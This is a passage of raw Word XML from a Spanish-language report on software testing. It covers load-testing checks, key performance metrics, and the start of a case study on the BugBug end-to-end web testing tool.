    </w:p>
    <w:p w14:paraId="4328E260" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:ind w:left="420" w:right="12" w:hanging="270"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="736A467F" wp14:editId="4F1F6122">
                <wp:extent cx="57150" cy="57150"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5509" name="Group 5509"/>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523" name="Shape 523"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="57150" cy="57150"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="57150" h="57150">
                                <a:moveTo>
                                  <a:pt x="28575" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="32364" y="0"/>
                                  <a:pt x="36009" y="726"/>
                                  <a:pt x="39510" y="2170"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="43011" y="3621"/>
                                  <a:pt x="46101" y="5686"/>
                                  <a:pt x="48781" y="8365"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="51460" y="11044"/>
                                  <a:pt x="53525" y="14132"/>
                                  <a:pt x="54975" y="17636"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="56425" y="21137"/>
                                  <a:pt x="57150" y="24783"/>
                                  <a:pt x="57150" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="57150" y="32355"/>
                                  <a:pt x="56425" y="35998"/>
                                  <a:pt x="54975" y="39498"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="53525" y="43002"/>
                                  <a:pt x="51460" y="46093"/>
                                  <a:pt x="48781" y="48778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46101" y="51451"/>
                                  <a:pt x="43011" y="53516"/>
                                  <a:pt x="39510" y="54967"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36009" y="56418"/>
                                  <a:pt x="32364" y="57144"/>
                                  <a:pt x="28575" y="57150"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24786" y="57144"/>
                                  <a:pt x="21141" y="56418"/>
                                  <a:pt x="17640" y="54967"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14139" y="53516"/>
                                  <a:pt x="11049" y="51451"/>
                                  <a:pt x="8369" y="48778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5690" y="46093"/>
                                  <a:pt x="3625" y="43002"/>
                                  <a:pt x="2175" y="39498"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="725" y="35998"/>
                                  <a:pt x="0" y="32355"/>
                                  <a:pt x="0" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="24783"/>
                                  <a:pt x="725" y="21137"/>
                                  <a:pt x="2175" y="17636"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3625" y="14132"/>
                                  <a:pt x="5690" y="11044"/>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C5A14E" id="Group 5509"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">
                <v:shape id="Shape 523"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" path="m28575,v3789,,7434,726,10935,2170c43011,3621,46101,5686,48781,8365v2679,2679,4744,5767,6194,9271c56425,21137,57150,24783,57150,28575v,3780,-725,7423,-2175,10923c53525,43002,51460,46093,48781,48778v-2680,2673,-5770,4738,-9271,6189c36009,56418,32364,57144,28575,57150v-3789,-6,-7434,-732,-10935,-2183c14139,53516,11049,51451,8369,48778,5690,46093,3625,43002,2175,39498,725,35998,,32355,,28575,,24783,725,21137,2175,17636,3625,14132,5690,11044,8369,8365,11049,5686,14139,3621,17640,2170,21141,726,24786,,28575,xe" fillcolor="black" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,57150,57150"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prueba de mecanismos de bloqueo</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Confirmación de que los sistemas de bloqueo funcionan correctamente bajo carga.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12814F73" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:spacing w:after="309"/>
        <w:ind w:left="420" w:right="12" w:hanging="270"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01DE3DE1" wp14:editId="45F8A320">
                <wp:extent cx="57150" cy="57150"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="6191" name="Group 6191"/>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557" name="Shape 557"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="57150" cy="57150"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="57150" h="57150">
                                <a:moveTo>
                                  <a:pt x="28575" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="32364" y="0"/>
                                  <a:pt x="36009" y="726"/>
                                  <a:pt x="39510" y="2170"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="43011" y="3618"/>
                                  <a:pt x="46101" y="5683"/>
                                  <a:pt x="48781" y="8365"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="51460" y="11044"/>
                                  <a:pt x="53525" y="14132"/>
                                  <a:pt x="54975" y="17636"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="56425" y="21137"/>
                                  <a:pt x="57150" y="24783"/>
                                  <a:pt x="57150" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="57150" y="32361"/>
                                  <a:pt x="56425" y="36001"/>
                                  <a:pt x="54975" y="39505"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="53525" y="43002"/>
                                  <a:pt x="51460" y="46090"/>
                                  <a:pt x="48781" y="48772"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46101" y="51451"/>
                                  <a:pt x="43011" y="53516"/>
                                  <a:pt x="39510" y="54967"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36009" y="56418"/>
                                  <a:pt x="32364" y="57144"/>
                                  <a:pt x="28575" y="57150"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24786" y="57144"/>
                                  <a:pt x="21141" y="56418"/>
                                  <a:pt x="17640" y="54967"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14139" y="53516"/>
                                  <a:pt x="11049" y="51451"/>
                                  <a:pt x="8369" y="48772"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5690" y="46090"/>
                                  <a:pt x="3625" y="43002"/>
                                  <a:pt x="2175" y="39505"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="725" y="36001"/>
                                  <a:pt x="0" y="32361"/>
                                  <a:pt x="0" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="24783"/>
                                  <a:pt x="725" y="21137"/>
                                  <a:pt x="2175" y="17636"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3625" y="14132"/>
                                  <a:pt x="5690" y="11044"/>
                                  <a:pt x="8369"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7DC7BE" id="Group 6191" o:spid="_x0000_s1026" style="width:4.5pt;height:4.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line"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">
                <v:shape id="Shape 557"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" path="m28575,v3789,,7434,726,10935,2170c43011,3618,46101,5683,48781,8365v2679,2679,4744,5767,6194,9271c56425,21137,57150,24783,57150,28575v,3786,-725,7426,-2175,10930c53525,43002,51460,46090,48781,48772v-2680,2679,-5770,4744,-9271,6195c36009,56418,32364,57144,28575,57150v-3789,-6,-7434,-732,-10935,-2183c14139,53516,11049,51451,8369,48772,5690,46090,3625,43002,2175,39505,725,36001,,32361,,28575,,24783,725,21137,2175,17636,3625,14132,5690,11044,8369,8365,11049,5683,14139,3618,17640,2170,21141,726,24786,,28575,xe" fillcolor="black" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,57150,57150"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Evaluación de gestión de recursos</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Identificación de posibles agotamientos de recursos que podrían ser explotados por atacantes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E43283" w14:textId="7CDD75DB" w:rsidR="006F0019" w:rsidRDefault="00F352BE" w:rsidP="00F352BE">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc196776210"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>METRICAS CLAVE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="61586A55" w14:textId="77777777" w:rsidR="00F352BE" w:rsidRPr="00F352BE" w:rsidRDefault="00F352BE" w:rsidP="00F352BE">
      <w:pPr>
        <w:spacing w:after="215"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F352BE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Las métricas fundamentales en pruebas de carga según Microsoft Azure (2023) incluyen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F4254F" w14:textId="6FBA76CB" w:rsidR="00F352BE" w:rsidRPr="00F352BE" w:rsidRDefault="00F352BE" w:rsidP="00F352BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F352BE">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tiempo de respuesta</w:t>
      </w:r>
      <w:r w:rsidRPr="00F352BE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Tiempo que tarda la aplicación en responder a una solicitud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4806CB" w14:textId="77777777" w:rsidR="00F352BE" w:rsidRPr="00F352BE" w:rsidRDefault="00F352BE" w:rsidP="00F352BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="84"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F352BE">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Rendimiento (Throughput)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F352BE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Número de transacciones por segundo que la aplicación puede manejar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFE1943" w14:textId="77777777" w:rsidR="00F352BE" w:rsidRPr="00F352BE" w:rsidRDefault="00F352BE" w:rsidP="00F352BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F352BE">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tasa de error</w:t>
      </w:r>
      <w:r w:rsidRPr="00F352BE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Porcentaje de solicitudes que resultan en errores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FF4AF8" w14:textId="711BDAE8" w:rsidR="00F352BE" w:rsidRPr="00F352BE" w:rsidRDefault="00F352BE" w:rsidP="00F352BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F352BE">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Concurrencia</w:t>
      </w:r>
      <w:r w:rsidRPr="00F352BE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Número máximo de usuarios simultáneos que el sistema puede manejar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65737BDA" w14:textId="1F1B5212" w:rsidR="00440C91" w:rsidRDefault="00440C91" w:rsidP="008C7F16">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47069A60" w14:textId="0D6861E4" w:rsidR="00F352BE" w:rsidRDefault="009F0340" w:rsidP="009F0340">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc196776211"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">TRES </w:t>
      </w:r>
      <w:r w:rsidR="00F352BE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CASOS DE ESTUDIO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="2D0847C2" w14:textId="31B59899" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="733DAF3C" w14:textId="77777777" w:rsidR="001D1995" w:rsidRDefault="001D1995" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6945F337" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>¿Qué es BugBug?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B907AFE" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30CB3F56" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">BugBug es una herramienta de automatización de pruebas end-to-end (E2E) para aplicaciones web, que busca facilitar enormemente el proceso de testeo, especialmente para equipos que no quieren (o no pueden) invertir muchísimo en configuración técnica. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A874168" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E52AD2" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Características clave de su filosofía:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA86D51" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70CC7F75" w14:textId="61EA2061" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">No-código / poco código (“codeless / low-code”) para muchos usuarios. Es decir: muchas pruebas se pueden grabar, editar, correr sin escribir scripts complicados. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A4F9D7" w14:textId="1D5F63D6" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiene herramientas más avanzadas si las necesitas: JavaScript customizado, variables, lógica condicional, etc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053BFFF9" w14:textId="20812987" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Permite ejecutar pruebas tanto localmente como en la nube. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D7B4B8" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Integra con CI/CD y otras herramientas de equipo (Slack, GitHub, GitLab, etc.). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D92962" w14:textId="77777777" w:rsidR="001D1995" w:rsidRDefault="001D1995" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C4E7ECC" w14:textId="2165AADC" w:rsidR="001D1995" w:rsidRDefault="001D1995" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Principales Funcionalidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202D7C2C" w14:textId="77777777" w:rsidR="001D1995" w:rsidRDefault="001D1995" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>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8"/>
        <w:gridCol w:w="5972"/>
      </w:tblGrid>
      <w:tr w:rsidR="001D1995" w:rsidRPr="001D1995" w14:paraId="3CBC6DB2" w14:textId="77777777" w:rsidTr="001D1995">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FCB326C" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>Funcionalidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="415A3552" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>Detalles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D1995" w:rsidRPr="001D1995" w14:paraId="403DE348" w14:textId="77777777" w:rsidTr="001D1995">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23C91684" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>Grabador de pruebas (Test Recorder)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7471790D" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>Extensión para Chrome que permite grabar interacciones del usuario (clics, entradas de texto, navegación) para luego reproducirlas automáticamente. (</w:t>
            </w:r>
            <w:hyperlink r:id="rId10" w:tooltip="BugBug Automation Testing - Chrome Web Store" w:history="1">
              <w:r w:rsidRPr="001D1995">
                <w:rPr>
                  <w:rStyle w:val="Hipervnculo"/>
                  <w:b/>
                  <w:bCs/>
                  <w:lang w:val="es-BO"/>
                </w:rPr>
                <w:t>Chrome Web Store</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D1995" w:rsidRPr="001D1995" w14:paraId="5AB5E88C" w14:textId="77777777" w:rsidTr="001D1995">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="214508DD" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>Edit &amp; Rewind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7071D99A" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>Si una prueba falla o necesitas modificar algo en medio, puedes ir a cualquier paso, editar, regrabar desde ahí, etc. (</w:t>
            </w:r>
            <w:hyperlink r:id="rId11" w:tooltip="BugBug's features" w:history="1">
              <w:r w:rsidRPr="001D1995">
                <w:rPr>
                  <w:rStyle w:val="Hipervnculo"/>
                  <w:b/>
                  <w:bCs/>
                  <w:lang w:val="es-BO"/>
                </w:rPr>
                <w:t>BugBug</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
